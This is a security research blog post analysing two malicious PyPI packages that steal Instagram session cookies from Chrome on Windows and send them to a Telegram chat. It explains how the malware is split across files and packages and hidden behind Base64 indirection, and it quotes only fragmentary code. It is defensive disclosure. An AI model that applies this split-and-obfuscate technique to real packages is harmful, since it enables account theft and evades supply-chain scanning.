By clicking “Accept”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

Divide and Hide: How Malicious Code Lived on PyPI for 3 months

The Station 9 research team discovered malicious code that was divided and distributed across different packages, remaining obfuscated for months while getting nearly 2000 downloads.

Open Report

View Report

Written by

Henrik Plate

Published on

July 21, 2023

Topics

Security

The Station 9 research team discovered malicious code that was divided and distributed across different packages, remaining obfuscated for months while getting nearly 2000 downloads.

Open Report

View Report

Many malicious packages deployed on OSS package repositories include the same or very similar malicious code - oftentimes simple code blocks with a few lines included in files like setup.py. Luckily, the detection and removal of such clones got better and better, i.e. the majority of malicious packages has relatively few downloads.

This blog post presents an interesting malware variant, where the malicious code is spread across different functions, files and even packages. The malicious behavior itself is very simplistic, but the obfuscation technique used demonstrates how adversaries evolve in order to hinder malware detection.

—

Many researchers and companies started hunting for malicious packages published on open source repositories like PyPI or npm, and it is not uncommon that packages flagged by our pipeline have been removed by the time we go through the findings.

Many of those packages, however, contain the same single block of malicious code in files like setup.py, __init__.py (in case of Python packages) or index.js (npm). This makes it possible to devise relatively simple detection patterns that can be run in a performant and scalable fashion on thousands of packages every day, e.g. patterns for abstract syntax trees or even regular expressions.

This blog post presents a variant where the malicious code has been divided into smaller chunks that were then distributed across several files and even different packages, very likely with the intention to hinder malware detection.

It is maybe for that reason that those two packages managed to have slightly higher dwell times and download numbers compared to packages of other malware campaigns: Both packages have been uploaded to PyPI on April 16th, and were taken down on July 7th following our notification of PyPI administrators (who reacted blazingly fast - they were yanked just 2 minutes after we sent the email). According to PyPI Stats, the packages gisi and ttlo were downloaded 1291 times and 667 times respectively during that time frame.

ttlo and gisi

The functionality of this malware is relatively simple and aims at hijacking Instagram accounts: It uses an SQL select query to search for Instagram session identifiers in the SQLite database that contains Chrome cookies on Windows. When it finds one, it updates its expiry date and exfiltrates the cookie value with help of a POST request to a Telegram chat.

More interesting is how the respective pieces were split by the attacker, especially the functions ttlo(), b() and gisi() in Python files with the same names.

The cookie search and update is part of the Python package gisi (which likely stands for “get instagram session identifier”) while the exfiltration logic was distributed with package ttlo. None of the packages, however, declares a dependency on the other one, thus, it is unclear how the attacker ensures that both are present in the victim’s environment.

Moreover, the malicious code was split across several functions in several distinct files. The decryption of encrypted cookie values, for example, is implemented in function dd() contained in a Python file with the same name.

And both packages contain a dedicated function to decode Base64-encoded strings, which was probably also meant to evade simple detection patterns. Instead of directly calling requests.post(base64.b64decode('aHR[...]Z2U=') [...], the attacker added another level of indirection by creating a string variable a and decoder function b() in a dedicated file. This technique has been used in both packages gisi and ttlo, which changes the call to requests.post(b(a) [...].

So what?

The split of malicious functionality makes it way more difficult for malware scanners. It is no longer sufficient to scan individual files with simple patterns. Understanding the program behavior requires gathering all the packages and analyzing all their files in conjunction in order to find suspicious data or control flows.

Such whole-program analysis, however, is more resource-hungry than simple pattern search, which makes it difficult to scale a corresponding solution to thousands of packages published per day on PyPI, npm and other package repositories. Of course, such malware improvements do not come by surprise: They are part of the typical arms-race between attackers and defenders, which takes place in every single IT security domain.

The Challenge

The Solution

The Impact

Get new posts in your inbox.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

Get new posts in your inbox.

Welcome to the resistance

Oops! Something went wrong while submitting the form.

Get new posts in your inbox.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

Improve Kubernetes Security with Signed Artifacts and Admission Controllers

AppSec Goes to Devnexus: Lessons from a Thriving, Modern Java Community

XZ Backdoor: How to Prepare for the Next One

XZ is A Wake Up Call For Software Security: Here's Why

SSDF Compliance and Attestation

You Have a Shadow Pipeline Problem

Artifact Signing 101 - On-Demand Webinar

Prioritizing SCA Findings with Reachability Analysis - On-Demand Webinar

Signing Your Artifacts For Security, Quality, and Compliance

Remediating Vulnerabilities vs. Maintaining Current Dependencies

Detect Malicious Packages Among Your Open Source Dependencies

How to Ingest and Manage SBOMs - Tutorial

How to Improve SCA in GitHub Advanced Security - Tutorial

How to Generate SBOM and VEX - Tutorial

How to Use AI for Open Source Selection - Tutorial

How to Scan and Prioritize Valid Secrets - Tutorial

Tom Gleason Joins Endor Labs as VP of Customer Solutions

Introducing CI/CD Security with Endor Labs

Highlights from State of Dependency Management 2022 - Webinar

Reachability Analysis for Python, Go, C# - Webinar

How Security and Engineering Can Scale Open Source Security - Webinar

Introduction to Open Source Security - Webinar

Comparing SBOMs Generated at Different Lifecycle Stages - Webinar

Why We Need Static Analysis When Prioritizing Vulnerabilities - Webinar

State of Dependency Management 2022

OWASP Top 10 Risks for Open Source

How to Prioritize Reachable Open Source Software (OSS) Vulnerabilities - Tutorial

What You Need to Know About Apache Struts and CVE-2023-50164

You Found Vulnerabilities in Your Dependencies, Now What?

Why SCA Tools Can't Agree if Something is a CVE

Chris Hughes Joins Endor Labs as Chief Security Advisor

What’s in a Name? A Look at the Software Identification Ecosystem

Why Different SCA Tools Produce Different Results

Why Your SCA is Always Wrong

Whatfuscator, Malicious Open Source Packages, and Other Beasts

What Security Teams Need to Know about Software Development

What Breaking Changes Teach Us about Security

What is VEX and Why Should I Care?

What are Maven Dependency Scopes and Their Related Security Risks?

What is Reachability-Based Dependency Analysis?

VMware Achieves SBOM Compliance for Over 100 Services with Endor Labs

Understanding Python Manifest Files

CSRB Log4j Report - The Response is as Dangerous as the Vulnerability

Strengthening Security in .NET Development with packages.lock.json

Endor Labs Raises $70M in Series A Funding to Reform Application Security

The Government's Role in Maintaining Open Source Security

Static SCA vs. Dynamic SCA: Which is Better (and Why it’s Neither)

From Cloud Security to Code Security: Why We've Raised $25M to Take on OSS Dependency Sprawl

Visualizing the Impact of Call Graphs on Open Source Security

SBOM vs. SBOM: Comparing SBOMs from Different Tools and Lifecycle Stages

Endor Labs Launches with $25M Seed Financing to Tackle Massive Sprawl of Open Source Software (OSS)

Key Questions for Your SBOM Program

SBOMs are Just a Means to an End

Reviewing Malware with LLMs: OpenAI vs. Vertex AI

SBOM Requirements for Medical Devices

Polyrepo vs. Monorepo - How Does it Impact Dependency Management?

Open Source Security 101: How to Evaluate Your Open Source Security Posture

Announcing the Endor Labs Hyperdrive Program for Resellers and Solution Providers

The Open Source Security Index Top 5

MileIQ Securely Reimagines a Decade Old Product with Endor Labs

LLM-assisted Malware Review: AI and Humans Join Forces to Combat Malware

Open Source Licensing Simplified: A Comparative Overview of Popular Licenses

Make Developers' Lives Easier with Endor Labs & GitHub Advanced Security

More Than 30 Industry-Leading CISOs Personally Invest in Endor Labs

Introducing JavaScript Reachability and Phantom Dependency Detection

Introduction to Program Analysis

Introducing the OpenSSF Scorecard API

Introducing Reachability-Based SCA for Python, Go, and C#

How Zero Trust Principles Can Accelerate Enterprise Adoption of OSS

Introducing a Better Way to SCA for Monorepos and Bazel

How to Quickly Measure SBOM Accuracy for Maven Projects (for Free)

Why I Joined Endor Labs to Build our India Team

How To Evaluate Secret Detection Tools

How to Get the Most out of GitHub API Rate Limits

How CycloneDX VEX Makes Your SBOM Useful

Exploring Risk: Understanding Software Supply Chain Attacks

Faster SCA with Endor Labs and npm Workspaces

Combining EPSS and Reachability Analysis to Optimize Vulnerability Management

Endor Labs’ ‘State of Dependency Management 2023’ Report Offers Insight on Explosive Popularity of AI and LLMs—and How They Impact Application Security

Endor Labs Wins Intellyx Digital Innovation Award